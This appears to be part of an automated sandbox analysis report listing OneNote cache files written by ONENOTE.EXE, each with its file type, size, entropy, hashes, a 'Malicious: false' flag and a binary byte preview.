SSDEEP:	384:gWM4VmeO+TM/z+CkS4Cmnv/RSzguIF2oE4Cq:NM4VmgTM/z+CkHCmnv/RAguIF2oE4Cq
MD5:	42EF33610EB363CCF0754CCBA4A8D842
SHA1:	F5C3D6204CD54B5CC0EBF39FBC9E84148F4D5F3B
SHA-256:	943A3B73B4C6AA1BD5FC14BA069A45691566886BB2FE2224FB31470788383C03
SHA-512:	E8C19A1B212CF0B253E373E216A6FD218C2A0E0A711E7273B7D79FEE7D105A9C8B5BD15283D08A5522D795DD243E9610F77DA39A8A948E82F5A33D2A1CE9C3E8
Malicious:	false
Preview:	2...>.......r...v.......p ..X/..2...>.......j...v...6....-..x........LZ.................;.@.\3...Uh.............;.@.\3...Uh....2...>.......r...v........-..x...........v........-..x....................I.......I.qk..B.....LZ....T.......S....."oE....S....."oE.....I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..............`...V...b..7<......N...^....................;.@.\3...Uh........4....................;.@.\3...Uh.........I.qk..B.....LZ.............`...V...b..7<..................................................................................................j.......T)y...............4.......a.......l.....$.N.$...$.................;........4...4...4............'...%.........z...,4. ...........$>........4.@!..7..............................D..n4..o4..p4...4. ..u-...............................;........4...4...4............................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000023.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	15740
Entropy (8bit):	6.0674556182683945
Encrypted:	false
SSDEEP:	192:Elv3GG8/OOs+GouFdxMlxjoPyerzkpuOo2vPMc62PaJseZC+BJoS/:EtNiwdxMlZoPhzkpuOo2PMc6rX8+B6+
MD5:	FFA5EC40DC9A0FD10EB9E6355142D6A6
SHA1:	3D3D6A7E086B3C610C08F1F3E3F883604F06F2A4
SHA-256:	D74C3973C8D1F7C77274691AFB1AA934940674341D7EEE563BE75E563281BDFD
SHA-512:	6FAF2A24D06E6008F3579C7CEC90C2887462BDF83FAD7372FBB74B8DE90340B580E9836F309B68A9794597A598F7DCDA661C9A58DA6D8187C69083B7A17C9CD9
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.........................................................................................!.1.....AQ..aq.g..8...."r....2.FG..#.E..7.Rb..Cc..D.v.B..3s..$d.%5Uu..&6fW'w........................!....1Aa...d..5e.6.q...Q..."2b.c..r3DE..BRs4U.#C.S.T............?...u.&0...cV.T.I...1..=4....Ce_.g.q.=F.M:>)...k..pm..h..=........S....)Ja8x...b.).=5.q..0......k.M.....1?-.G.b&.5..Ep.8t...'...R)..ta.F$bXO]tW.b.6#.t.XWN..ZW......].....G....x&&f..'L.....7...\...'.8...~`.sa...............................................X........qo...SMk...'.V...i..hb.}&?/.k.:>l.^....>Y...<}...&.jY.Gn.MKejyV......D......gf.0....t.nw..XQ...H.B.....=8.UkR.....Hm..w..]...k...#Z...F../.gjWvf.....w.aZ].2..5..^...VZv..._.7..a.\|...:.B...,f...............~....m.;_.....-.e.y.w.[m.].bu.b.f+.E++\.....Y..7

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000024.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	12288
Entropy (8bit):	3.761757753845994
Encrypted:	false
SSDEEP:	192:IsViKJW4XhzVt9pBs1UW3Lg10r2/ga67OX483y77RtCAVyHO7:9TPX5VvpBsTY0r2b6k4WyvRtFyu7
MD5:	17741BB7A233DEF377CDB65BD185462B
SHA1:	46772D929512BBDAFF5D841229A2C41B788AC840
SHA-256:	6E2D0F3BDDC0D8FEA01D45687707094BF31E607C8BCAB17AC0D8208A50E71ACE
SHA-512:	BEC2F947326E85CC9600F7C951C2F2557C7F652193F673BB25EE94E943AF99ABF09E9DCBB8EF363B5644F1FE03D9BA8F5CB7304D9E3391C815BA0DCF7918F142
Malicious:	false
Preview:	2...>...h.......v........ .. !..2...>...........v.......@................................................................................................................................................I.......I.qk..B.....LZAg..9...Ag...x...b...."Ag...x...b...."Ag...I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............H.e........>]..g....N...^................'.T.0@E...................>....................................I.qk..B.....LZ............H.e........>]..g.................................Ag......Ag......Ag..........................................Ag.j....Ag.T.~..Ag......Ag...P..Ag.H....Ag. ....Ag.$....Ag...n...............;........4...4...4.............Ag.:Ag.jAg...z...y.. x.. ...........$........!..7!..7........o.e.L.o.c.I.D...o.e.L.o.c.C.o.m.m.e.n.t.......0.0.0.1.0...........Ag.:Ag.LAg...z...y.. x.. ...........$........!..7!.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000025.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	55804
Entropy (8bit):	7.433623355028275
Encrypted:	false
SSDEEP:	1536:gVvci05lhVbfBcWvBLeynluexaWqzww/u5:gVUZhHDljaHww/u5
MD5:	4126992F65FE53D3E3E78F6B27FD49DC
SHA1:	BC0D76B69310DA9B909D3EE4CECBFE5F386BFB45
SHA-256:	3FBE3C1C238BD7DBC67F8CFF5F3BDDFD513C96A9851B9616477947D21DFF4B2E
SHA-512:	624853F5E56D224C8188F122B2C4724F867D4099E7FAAFB9C945BE7E2907900ADCF4AE97AB08909CF94E96FB6F381E3B6396D560D93EB2731E4E69CBFE628F10
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d..............................................................................................!1...AQ.aq"2.....BR..8x..r#..9b....3....CS$.'.cs.......7Gw.(.4%5&..Wg.h......tEVfv..H..........................!1A..Qa.q...."2..u6....BRr.#...b..3s..d...7.Cc.$Tt..S4.5Ue..&..%.................?...,...8..{..S.y.N....%..q.8..H[5....o..xg........)c(.eO.YO..._D..x.U.....%.S.r.r._.^..Su.h.Q.t.:.#?....x..B.S...Q.....oqF..%..8'.qx....%.2JKjF..{y.w0.a.RMb.c.Q{%....eW'..[IV..'ZW3...[...MN.....rO.:....$.i..7....Vrrr...I.r..M..Qo..j....q.^...N...J......%.J..)F...>$.....u........o...+......[.....t....R}.I..R..S..GB..:......).6_[^Xft...F.1.....zP....,.#....MG.T..Q.F.....)Fi../.I...,%.voEb.b.Z..V3..FT.}..[Z{....wd.z.e.....QwW(.).t..\..'....:)<W.<..&k...caRT.X(..K.....:f...]...q..

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000026.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	12288
Entropy (8bit):	4.667456586912036
Encrypted:	false
SSDEEP:	192:dsI9duVqwX6bAsiUSBxuXgTXL25ijFRthfm15sk0mX9cEP9ze57l0GUOFYaUwsF:iWduVqwXgCd/x6eFRth+15sk0mtchBlU
MD5:	90F7465C6B9923BDA931E76E4CE3306A
SHA1:	FD9DF2768EA6C20C9722A736B1EB6606EC31FDF5
SHA-256:	B07EEC8AEF0DD3C263AF30A01D7CDD4D40BA90AC6BD93C83CF4EDEE02B9BFEC2
SHA-512:	D37B44316FB644C770CBBB0365C0E7909ED75A830ADF26FD693A34E9EF972996860619C985BE83840B09F97A2E284ECA8FF90F955104D2C7D9744B8BAD9DCE2C
Malicious:	false
Preview:	4...>.......N...v..."...( ...+..4...>...........v...j...@...............................................................................................................................................I.......I.qk..B.....LZH.......H...0M...k_..8..H...0M...k_..8..H....I.qk..B.....LZ.I........E...x {R...............I.......I...................................................I.t.....I................................................................4..'...'.............S..o...G.1(.%..........f...Z..................H.??5.d.Y....N...^........................................I.qk..B.....LZ...................H.??5.d.Y.................................H.......H.......H................................................c.....(.Z.....(....H..j....H..T.u..H.......H....2..H....m.......z.......R...................!..7............W.i.n.g.d.i.n.g.s......333..................;........4...4...4.............H..:H..LH..YH..KH....z...y.. x.. ........ ..$...$........!..7!..7............o.e.L.o.c.I.D...o.e.L

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000027.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	41893
Entropy (8bit):	7.52654558351485
Encrypted:	false
SSDEEP:	768:pZvVQkUbOHxx3pvVmO5rsP5gUdXwFMuv53knzyncaXgRDqPU:pZkijV5wScXwFMYknzucaXgRyU
MD5:	F25427EFECFEE786D5A9F630726DD140
SHA1:	BC612A86FF985AB569ED1A1EA5FFC4FDB18FC605
SHA-256:	5A36960DF32817E8426BD40A88F88B04FB55B84BAEF60F1E71E0872217FDB134
SHA-512:	B102F34385196D630F198667E874F25ADBC737426FDAE0747EC799B33632E5DC92999C7C715DC84D904342738930267AB1709870BDAA842243E4C283FE5E1554
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d...........................................................................................!.1AQ....aq......"......2...Xx..9BRr#.b3$..&..g.8....%F'G.(H.Ss..D5E..v..W..Cc.deu..7w.h.).....................!.1....A..Qaq...Ttu.6..."R..5...2B..S....bcs.Dd%&r3C...#$...Ue.............?..R...%.R...t.MQ.l...v...V]..n...Zw....M....4..F.&&bb0.:]l......ay.r<..3.l.Q^.........I54.N2.8..2s...w..r6.......[1Zh....O...9..>...B......x]...r.\.\..v..~....y.QT.3.......=....r..}.l.....o;....M..C1....w)...+o1f.]...MoA.E..s5..i.\....miGsy..m\.Zj....I'YU.\tU6La5v.>.K..m.]1.......k..0....</5v.V7lY.e.vV.+./[....f..u{....s.}.Rb.Z.....Y.6]..m....V.\...Mr.=r...K...l..%..m^.......X.(..fG..[Fly.jL.a4..vs..o.e..q.9km..w1.yg.....r_.*h.n..5i.-.{Y.l...<...'Or.s..Z....../JP.....\FV.S..............m

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000028.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	12288
Entropy (8bit):	4.609033205052034
Encrypted:	false
SSDEEP:	192:VJLsyLKdUjAkdQP6+CaESXsMXnR/JX9RtI+tVKeyc9HszklpJW0NPdF9rw/:QyLIUjAwQPVCn2vRBX9RtrVJygHFpdFQ
MD5:	01E6C80237C51A43B53B7B68752B4FA0
SHA1:	C2750672AC3AF61D1E6C7F31E051FC6D42A6DD69
SHA-256:	20678678FA41048B11307C935EB7591971AEDDEF5B03307E9EA325F9AAE49150
SHA-512:	6A4228ED1E67BE473815A97B7D41789CD561CB7CB892865C48E2491F56585161EB541A910046D293A4ED847EC17A60CDA7788E343029D32EAD3B26D6B351C78A
Malicious:	false
Preview:	2...>.......<...v.......` ..`+..2...>...........v...X...@...P...........................................................................................................................................I.......I.qk..B.....LZ.E.G....EK^...8c._..M..EK^...8c._..M..E..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..............]...8M.;.w...c....N...^.................\|....@..7n..-.............j....................................I.qk..B.....LZ.............]...8M.;.w...c..................................E......E......E..........................................Ej.....ET)z...E..`...E......E..D...E..a...E$.6.$.E$.................;........4...4...4..............E;.EY.EX.E..z...y.. x.. ........ ..$...$........D...E.......!..7!..7............o.e.L.o.c.I.D...o.e.L.o.c.C.o.m.m.e.n.t.......0.0.0.9.........$....................z.......R.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000029.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	14177
Entropy (8bit):	5.705782002886174
Encrypted:	false
SSDEEP:	192:EbgGcV/hlvpfal7rgYa8S7auAxwfuSTmCSNoFQ6NO7L:EbgGcVnpwimnd38FdQL
MD5:	7CDCE7EEBF795998DA6CAC11D363291C
SHA1:	183B4CC25B50A80D3EC7CCE4BF445BCFBAA6F224
SHA-256:	DE35AF949D4F83E97EE22F817AFE2531CC4B59FF9EE6026DCA7ECEBC5CF2737F
SHA-512:	560FB15A9C12758D11BB40B742A6EAD755F15AD10D6C5DEBA67F7BC8A2AE67C860831914CBCBCDED9E6B2D1D5F26A636B9BCEF178151F70B4D027316F94F27E1
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d........................................................................................!.1..A....Qa".q..2.....&...B%6.'..R#3.$E.r457bS.DUFV.Wg(.......................1...3.Q..2Rr....s.4.!Aq.S.aC5B$%............?...n.Liq.}.{#....3/gg.1.M +..~3...q..+=..:.g.i1;P)7.....q..n.s"p...wx........v.t.f;..L/..~....y.r[.r.....n.n3..6i..g..}../........3..x.L.i?We..l.......~..<.;..6..o.....N.t.o6.l..~.......<...m.V...Q.7k.u./wq.t..;.I...}..{...>.L..3m..a....yd......6~.f..~Y..}+..<.[w..'-..?.v.7...v.u..4.......1];..u.MO.......s..p..ms.'.O-o...O......m.k.e....)t....i>..E\|....,iOyD\|.{......g.n...cu....=..........h.\.Q:?g/?.I.3._...t...d.n.0.%y....S.Q....S.&K.w..&wY<....%.g.v.....$y..#,i;.=...t...I6..yO..o.d..w\k...~......)..rK.......].u....N....e.s..kU.u..'}

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002A.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	4.6923195586223265
Encrypted:	false
SSDEEP:	768:M9vNPlFlv1RWvTY8nENVQrEXqbchkcoY03z9Q:6lPlbtneX4XrhA3z9Q
MD5:	3DF7C62B9D30AAA6C596181023E13485
SHA1:	198D9C133CC59BCF0B3A569224BBF16F4E4E2644
SHA-256:	1A70412E8D3BD4251AF01CED1A4F8E24C0C16564F6B7B7135682673910A55F09
SHA-512:	FE221B7C821E9AA79C76F29F440659064008D042D4463B683E5672D5E88604E8956DBDE6503FB84E2A4FFF514C4F3AD5DE4562D924ED327FF1AB57142CBB7D36
Malicious:	false
Preview:	....Z....&.......%...&..0...( .. @...`..............Z...2&.......%...&.....( .. @...`..H...................................................................Z...J&.......%......(...( .. @...`..........B.......B..a..HG..}y.Z/.............6.K..P..#L...R..i'....5.&$P..R.8.#YXM6.8..p.9..8.#.....W.w..L.....].......................................................................B..T.......T.....O.T$......T.......T$5..{..T.`..:.:T$...oa<T.............0...........e....4........................~.K$.hcM..~.........(...`E......(...$...B.i.n.o.c.u.l.a.r.s. .C.o.r.n.e.r...j...P.a.g.e.L.o.c.I.D...L.o.c.V.e.r...P.a.g.e.V.e.r.C.o.m.m.e.n.t...P.a.g.e.O.v.e.r.i.d.e...P.a.g.e.N.a.m.e...0...0.0.0.8...1.....0...U.n.t.i.t.l.e.d. .p.a.g.e.........&.......&.......C.$...p{.......{..<.H.O.R.D./..2...\.......d.......p...v...........W....@......&...{...[.7...............0...........e....4.........................u.4..G..p.".a.....(...P.u.....(..."...B.l.u.e. .M.i.s.t. .M.a.r.g.i.n...j...P.a.g.e.L.o.c.I.D...L.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002B.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.352680336674789
Encrypted:	false
SSDEEP:	48:8Bsx6w8scXL7rXMt8tYt3MNE8oZXk5q9Ou5DcTrdhSrky5YtX709BszdZ7nlw9:8BscL7rf66E8cXkM999GRAzys
MD5:	90675D3546A1255E7900E8EC934DAA4C
SHA1:	ABBC54F4B5BB5EEC30FC4EF6AAAF3C25B1A52D55
SHA-256:	6FAA7D596A3D0A3C12D487E9F37628497260A1583347F23F149D7F44FEA0CC48
SHA-512:	56254F7BCE4352767A0EFE00EB0BB29626E0D4178FCC6E0C6346C7CD91BB2D95797A9E4579CA0C00F8C8AAA7CF0913A05CCB11FD987025326F4B24076DC74EF2
Malicious:	false
Preview:	2...>.......R...v...F...................................................................................................................................2...>...........v...z............................I.......I.qk..B.....LZ.;......;N....q1..Gn..;N....q1..Gn..;..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.................n....ve.+'".....N...^..................gV{hA.`.l.;zU........f........................................I.qk..B.....LZ................n....ve.+'".............n....ve.+'"...........;......;......;..........................................;j.....;T.]...;......;..B...;H.....;..B...;..>.).;..J...................;........4...4...4.."...............;..;..;..z...y.. x.. ...........$........4...(..7(..7........................;........4...4...4..........;......;....#.;............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002C.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 814x105, components 3
Category:	dropped
Size (bytes):	12654
Entropy (8bit):	7.745439197485533
Encrypted:	false
SSDEEP:	384:JheN2cq6MLu6MLGu54cHeNzhcmhcDu53eNE3UPkhrxvu:Ji2Wix7fzVsbE3Zm
MD5:	4BCCCDBB4273ECEBE216C84930A8D0B2
SHA1:	FFBF617787E27BC94D9BAF89F2FE34A2BD42794B
SHA-256:	474F9A8C25D5E21192315397EA995B1E11E2C1608157C6E0277688091BFD136A
SHA-512:	DAD73A8C0E293B88685C0C71EF15E0DC95EE39B7FC9F849DE5D634173FD9FA0AF0AA96742D9E94BE03556AA4A817D5001C95A6736EAD5D5DF03661876785EB74
Malicious:	false
Preview:	......JFIF.....H.H.....C....................................................................C.......................................................................i..............................................E.....................U....V...f..ASTc.......de.1Qq...!Rb....Ca."r.................................B....................b....Ra.....!Qc.....AS.1U.."C...2Bq...$#3%&.............?......3.....~......:..g..s"......:..g..s"..ic..Vk.f.. :..f..h.....Vk.f.. :..f..h.....Vk.f.. :..f..h.....Vk.f.. :..f..h.....Vk.f.. ..0...Q_..X..V5E~..c..X...@u...cTW...0...Q_..;.m.....@w...Q.+.....4W...lUFh....v..._..wn...dW....y._..v..E~......@wn...dW....y._...v..U..@wn...d..{`;.\|U.2g....3...:.0?ViN.z.@w...4.M.:m..`~..i7...q...I....J.`l...W..n..PQTiB...6....+..sj.."...6....+..WA...x..A........(.N6`..AD.q.....'S...t.Q:.l.......f.]..N..0.. .u8..A........_W..Y...}.C...~....&.E~....&.E~....&.E~....&.E~....&.E~....&.E~....&.E~....&.E~....&.E~....&.E~....&.E~.v..?U..^.r..}..Bep

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002D.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.353733817353949
Encrypted:	false
SSDEEP:	96:os7/isDuQSLKgEpaXku29VxkRACTuc3/S3y/:oszisDuQSW9paXkb9VxkRAq5P
MD5:	DBDFE0671621CC658D3310852FDCEDE6
SHA1:	D51AF27E75B9AD4C7C261E3B9FD263B76EF386DB
SHA-256:	B9AD91ED2286D26CBDC202B601C057743EB56B45881C3C9173337FEFDC277993
SHA-512:	1B204A1546B20ABF8D1635D09B0646C5EEBEA1519D7C45E98E78CB992487AD477447A617C8AE27F6537D0785A129B12A10D50A8C364F74F454B97DD63FD680B6
Malicious:	false
Preview:	2...>.......R...v...F...................................................................................................................................2...>...........v...z............................I.......I.qk..B.....LZ..c.......c..<....)HS....c..<....)HS....c..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..............@Es.9.Ato..b....N...^................%.\.F.A..............f........................................I.qk..B.....LZ.............@Es.9.Ato..b.........@Es.9.*Ato..b...........c.......c.......c...........................................cj......cT.]....c.......c..B....cH......c..B....c..>.)..c..J...................;........4...4...4.."................c...c...c..z...y.. x.. ...........$........4...(..7(..7........................;........4...4...4...........c.......c....#..c............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002E.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 728x77, components 3
Category:	dropped
Size (bytes):	2695
Entropy (8bit):	7.434963358385164
Encrypted:	false
SSDEEP:	48:N9YMsguOZgKAz2vcaQU4R8r4BU0/Rc4nbIQdsohw13ZmFLY6KsVvMdBL2mr:/hsEgNz2v5T/rQC67SoWniHK4EdBH
MD5:	B23DE98D5B4AFC269ED7EBFDDECE9716
SHA1:	10AF507A8079293A9AE0E3B96CF63A949B4588AA
SHA-256:	646586CB71742A2369A529876B41AF6A472C35CC508D1AE5D8395D55784814F2
SHA-512:	BBACBE205EC0A4F4E3AB7E2B1DEE36FCF087DDF77C7D18B53AEA4B15984A47C64E19F9B8D8FA568620619CEA0361D94FE7ABEA6E502EC6ECAEFE957F42ED7EE8
Malicious:	false
Preview:	......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......M....".......................................,.......................1....!ABQRq.2a."CbS.......................................................Qa1A............?....{............i........l..-D.q.~..\|cS.S...R\..d.8,!.....]f$....Q..di.;~5......vj......MqCe..=..f^..=.}.Cm]qCd..s=..u.e..v..t'.,.....S.s..N...>.d4'.,..k...N...d..9....G...y....6J.Y.l.{Vf...^B..i.3.z....:5W#4@.S\fj.%..Mb.5.v.5......S.E..#.v.I.....I......m..H....D..\|.Y\|...W.Wf..o..U.0.E..@.T.....................................'.S../...Z......!J..1K..rI...T.f.>.+.N..o.....\..^u........e..q.qK.GXP..-...F8".;5J...]Y......j.a.,R.......J.N........z}<qu..J.)`.}X:..}.............B...[. ......,B.).b.......(Y.O....c\.o.e&.W.#Bo..N\|..N8.#J.>1D.1..b.&....q.#..UT%,.d.....m&..^...VXA..b.nbTV~.....^........q..#./.I..=Q..=..Y..Ib...VZ+......Y.........'.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002F.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.354487021310167
Encrypted:	false
SSDEEP:	48:e42s1cbrRdR2geBt0Z6E/EuKXMf97dlclrdhSr3C2tXW4593D4Cd:e42s10NWgAbE//KX097dlARAtLf
MD5:	00100E68C8F9307C15427AF5066A9E67
SHA1:	E3F183C76ED34F14821192E0AA06447DF1C3CC03
SHA-256:	12E8C70243FB2829F556D4172DE26D1FAB86E61291047C37EBE260D5F2D42678
SHA-512:	15C1F2F0020C4FBBC623956D82B9B730BDE6CAD4C34374B9778804F33D131A60DF6D5A0EE9F6B65FD7D7E300C6E80D6B49A6779F44A9DBFCB0A007C44EB751B5
Malicious:	false
Preview:	2...>.......R...v...F...................................................................................................................................2...>...........v...z............................I.......I.qk..B.....LZR.......R..............R..............R....I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..............f`...j.-XR,d..m....N...^...............c.9....J.......]........f........................................I.qk..B.....LZ.............f`...j.-XR,d..m.........f`...j.-XR,d..m.........R.......R.......R...........................................R..j....R..T.]..R.......R....B..R..H....R....B..R....>.)R....J...................;........4...4...4.."..............R...R...R....z...y.. x.. ...........$........4...(..7(..7........................;........4...4...4.........R.......R......#R..............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002G.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 69x630, components 3
Category:	dropped
Size (bytes):	11040
Entropy (8bit):	7.929583162638891
Encrypted:	false
SSDEEP:	192:u99+91V42ho91V42ho91V42ho91V4235z9pUkDCyixxo4PS6b8tEy3BcWWhhSy0b:ubKD4/D4/D4/D4uzX38u4PNYJ2zhhmb
MD5:	02775A1E41CF53AC771D820003903913
SHA1:	2951A94A05ECF65E86D44C3C663B9B44BAD2BC9D
SHA-256:	83245F217DEAE4A4143B565E13C045DBB32A9063E8C6B2E43BB15CD76C5F9219
SHA-512:	5A1FCC24BDD5EE16BC2C9BACF45BCECF35ED895EAC22D2C4EE99C1B7E79C8E8B9E5186E3D026BA08FF70E08113F0A88FBF5E61C57AF4F3EA9BA80CE9F33410E9
Malicious:	false
Preview:	......JFIF.....H.H.....C....................................................................C.......................................................................v.E.............................................S..........................Aa..!12Qqw.....3568rv........".....4Btu.....#Rs.(W..bg.................................D.....................1..2.!4Aqrs....Qa......t..."3BRb....#.$S.Cc..............?...K/h._+.N6.-.a...5...;.r....,...0B.s(..zp..4.%r\|q..E.Q^.../...C.R..?u.q8XN.>.e..:..gJ...._.n>.70G,..(........3b.&.5m...Q../...7Ie..k....e.l6..&..`Gt.P.Y^r...=..Y.e...N.B...O.#..J+........u.V;G.'.....V.]8..C.]..........E.....c..w&lX..f..\T.J?...F.,..m\|..93........,.....+.R..WG...%.....(@.....p].iEz<.8.^...J.h.....a8P.1......(z..y~.........H.Z^.>..<.....L.k..IG...R.(.%..m....&u...B\|.....@]ey.W.J...!d..R.8...[..>8....(.G......!.)X.....,'..F2.Z.t..Aw./..Z..#..i.kK.......b.i...qR.(....RE.............O.XP.#..(...9J..]...,.2.[w....KrW'...tY.......{~.:.+..

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002H.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.473110142834424
Encrypted:	false
SSDEEP:	48:ys3/jY1a9XttUEP3F7vXS9PqdtjcTrdHr76tXBzI/MBn:ysc1aJtWEP3FzXS9PitjqRLOCM
MD5:	599880C6A75F6F8561F171FB8C730EDD
SHA1:	E8D8411FA8AF5B88BB37831385F4529B218D7389
SHA-256:	2D6D91E54E35F8D4BAFBB7AE0D0A04793D428AFE6F0E5161235DAAE56300DA7A
SHA-512:	0BED6945A0FA571FC38CE87C8CBD421373D661A735602D18C229ED43B58F0B9B4304239AC41A331BEBBDD5C4C7D912424AF75445E1B0C670BA89D84E67636EEC
Malicious:	false
Preview:	2...>.......p...v...d.....................................................?....?........................................................................2...>...L.......v................................I.......I.qk..B.....LZ]......].}..`..W`.'...].}..`..W`.'...]...I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............Hyf..BQ.$F.UZ.......N...^...............;..s./.E...>.. ........Z................................... ....I.qk..B.....LZ............Hyf..BQ.$F.UZ...........Hyf..BQ.$F.UZ............]......]......]..........................................].j....].T%c..]......]...G..]...H..]...>..]......]. .3...................;........4...4...4.."..............]..]..]...z...y.. x.. ...........$........4...(..7(..7........................;........4...4...4.........]......].....#].............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002I.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 105x441, components 3
Category:	dropped
Size (bytes):	2268
Entropy (8bit):	7.384274251000273
Encrypted:	false
SSDEEP:	48:N9YMn9H5gXlM26vroVXWxyNnl1LmLR+rn4FOeewGhDbby:/h9SlMdgm09ll8R2/rby
MD5:	09A7AE94AA8E517298A9618A13D6E0E2
SHA1:	FA5181A7414BA32F816BF0C4278EC20C615E8B1A
SHA-256:	3C68C7EE798E62A4A99C740153F3980D7DF029605C843410942C7F85E794823B
SHA-512:	074E9A2BE2039D0AFEAD360157550B934FABD0CB86B5AF476C1FBC885EE60331F5A68EAF70BF76E23C8248A20FB900346839F4AA8892370B5889E64948DCC6E2
Malicious:	false
Preview:	......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222........i..".......................................3......................!.A..1Q."q.2BRa.b...#$................................... .......................!12AqQ.............?..D.z.4....;.....7...3.t<!..d.O.....+O+.;.z6.4cz7E.........U.Z)-..@..y...........}(W...<.xv/...5.ew......yN....n.Tk.Tm.Ty.vA=...T..U....h...e.8.5%....'......e^......L.g.$.~e..O.._...... .F`.....xnL.<.......]jfv...}..\G..c.......-%...#.C.\|.].`..^..W..c..B..5D.QSTaZ.5A=....BU..z%.4.h.6..=..U...W.$..l...7.:...........IPQT_...~..i..x....~.l.\|.n.J..TV.21.Tg.....................j.z!+.-............"j.j...)..TT...."....T.Tc.j..............j.z!.h...&.&.&..e.%..TksTW%G.?".l+$..c._9..[x...TU..........i~X..#'.qm?ttO.....}.i...q.....9..r..?..W..d.w...f;..q...tZh..0.....2.......OD%Q-.......$......56.K.O...y._.._C.k..p9.p..O..vu...'........0v

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002J.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 76x97, components 3
Category:	dropped
Size (bytes):	784
Entropy (8bit):	6.962539208465222
Encrypted:	false
SSDEEP:	12:869YM8fij0W/xfuCp7ovv1bidiMn3bGi6AETQcdH8SADjoZgV6v9jUEvS3/g:N9YMWeI424diMn3yinsQeHvADu9QEvJ
MD5:	14105A831FE32590E52C2E2E41879624
